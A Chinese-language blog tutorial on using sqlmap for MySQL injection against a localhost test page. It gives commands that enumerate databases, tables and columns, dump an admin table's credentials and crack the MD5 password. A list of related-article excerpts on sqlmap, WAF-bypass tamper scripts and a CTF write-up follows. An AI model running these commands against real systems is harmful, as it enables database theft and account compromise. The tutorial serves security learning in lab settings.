sqlmap之(四)----Mysql注入實戰

原創 lixue20141529 2018-09-03 18:08

(1) 查找數據庫

[html] view plain copy
  1. sqlmap.py -u "http://localhost/sqls/index.php?id=123" --dbs  

數據庫有8個

(2) 通過第一步的數據庫查找表(假如數據庫名爲test)

[html] view plain copy
  1. sqlmap.py -u "http://localhost/sqls/index.php?id=123" -D test --tables  

猜解出來裏面存在admin,sqltest兩個表。


(3) 通過2中的表得出列名(假如表爲admin)

[html] view plain copy
  1. sqlmap.py -u "http://localhost/sqls/index.php?id=123" -D test -T admin --columns  

爆出字段有有“user、id、pwd”

(4) 獲取字段的值(假如掃描出id,user,pwd字段)

[html] view plain copy
  1. sqlmap.py -u "http://localhost/sqls/index.php?id=123" -D test -T admin -C "id,user,pwd" --dump  


do you want to store hashes to a temporary file for eventual further processing with other tools [y/N]

你想存儲的哈希值來與其他工具最終進一步處理臨時文件?   輸入"Y"

do you want to crack them via a dictionary-based attack? [Y/n/q]

你想通過基於字典的攻擊來破解他們嗎?  輸入"N"

馬上就得到了用戶名


與MD5的密碼: 3f230640b78d7e71ac5514e57935eb69 去破解下得到"qazxsw"

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章

Sqlmap使用教程

原文鏈接:http://www.cnblogs.com/studyone/p/5426303.html sqlmap簡介 sqlmap支持五種不同的注入模式: 1、基於布爾的盲注,即可以根據返回頁面判斷條件真假的注入。2、基於時間

u012063507 2020-06-28 02:47:49

網絡安全-sqlmap實戰之sqlilabs-Less9

目錄   類型 -dbs枚舉數據庫 --tables枚舉數據庫表 --columns枚舉列 --dump枚舉數據 查看源代碼 類型 時間盲注-單引號 -dbs枚舉數據庫 使用-o參數優化,,--technique參數指定技術,--batc

lady_killer9 2020-07-04 12:44:44

sqlmap整理

sqlmap整理sqlmap支持五種不同的注入模式:sqlmap支持的數據庫有:基本格式sqlmap -u “http://www.vuln.cn/post.php?id=1”sqlmap -u “http://www.vuln.

Empire--wisely 2020-07-02 11:21:35

suricata+bwapp靶場sqlmap實測

suricata+bwapp靶場sqlmap實測 文章目錄suricata+bwapp靶場sqlmap實測0x01 suricata的配置0x02 啓動suricata並攻擊靶場1. 啓動suricata2. 觀察3. 使用sql

One-Shell 2020-06-30 16:29:39

網絡安全-sqlmap實戰之sqlilabs-Less3

目錄 類型 注入判斷 -dbs枚舉數據庫 -tables枚舉表  -columns枚舉列 -dump枚舉數據 查看源代碼 類型 字符串轉換錯誤,他又提示輸入數字型ID,應該是把數字轉換爲了字符串 注入判斷 截圖  結合課程1,猜測sql

lady_killer9 2020-06-28 03:36:53

網絡安全-sqlmap實戰之sqlilabs-Less4

目錄 類型 -dbs枚舉數據庫 --tables枚舉數據庫表  --columns枚舉列 --dump枚舉數據 查看源代碼 類型 雙引號注入 id後“ 猜測sql語句 select * from users where id = ("

lady_killer9 2020-06-28 03:36:53

數據庫注入方法和繞過技巧

文章目錄背景SQL注入的方法報錯注入概念Payloads數溢出報錯GROUP BY 報錯XPATH 報錯聯合查詢概念Payloads**Mysql >= 5.0**MySQL >= 4.1未知列名的情況堆疊查詢概念Payloads

BingSlient 2020-06-27 05:04:58

SQLMap之1概述

通過這段時間的學習,我發現了好多好多工具等待着我去學習,我準備第一個開始學習的是SQLMap。 對於SQLMap的學習,我找了一個安全牛課堂的視頻,並且打算結合着書上一起學。 下面這篇文章就是通過看書和看視頻,並且瞭解、補充了一些

ISNS 2020-06-24 19:23:17

SQLMap簡介

簡介 SQLMap是一款先進的自動執行SQL注入的審計工具。它可以針對指定URL 進行掃描發現並利用SQL注入漏洞 當給SQLMap一個URL時https://baike.baidu.com/item/%E5%AE%A1%E8%A

π_π哦 2020-06-23 11:08:56

sql注入-sqlmap的使用方法

獲取一個url: http://localhost/sqli-labs-master/Less-1/?id=1 判斷是否有注入:python sqlmap.py –u “http://localhost/sqli-labs-mas

一个蝙蝠的故事 2020-06-22 16:01:21

SQLMap使用攻略及技巧

官方網站:http://sqlmap.org/ 下載地址:https://github.com/sqlmapproject/sqlmap/zipball/master   1.1 sqlmap簡介 sqlmap支持MySQL, Oracl

Mm901 2020-06-21 03:06:52

SQL注入_入門篇

                                                                                                                 

fiona_xlh 2020-06-20 17:28:44

SQLmap繞過waf的腳本詳解

使用方法--tamper xxx.py   apostrophemask.py   用UTF-8全角字符替換單引號字符 apostrophenullencode.py    用非法雙字節unicode字符替換單引號字符 appendnu

fiona_xlh 2020-06-20 17:28:43

[wp] 攻防世界 ics-04

嘗試註冊登陸賬號 掃了下目錄沒發現什麼,用sqlmap把每個頁面跑過去,發現在找回密碼頁面有注入 sqlmap.py -u "http://111.198.29.45:46827/findpwd.php" --data="use

MercyLin 2020-06-19 12:28:32

利用SQLMap進行cookie注入

SQLMap被稱爲注入神器,N多大神都使用SQLmap來進行注入測試,我等小菜當然也會用來裝一下A*C,用了N久SQLMAP了,但是極少用到cookie注入,一遇到cookie注入就去使用注入中轉工具,比較麻煩。剛好今天羣裏的USB問起

kuxing100 2020-06-17 07:14:14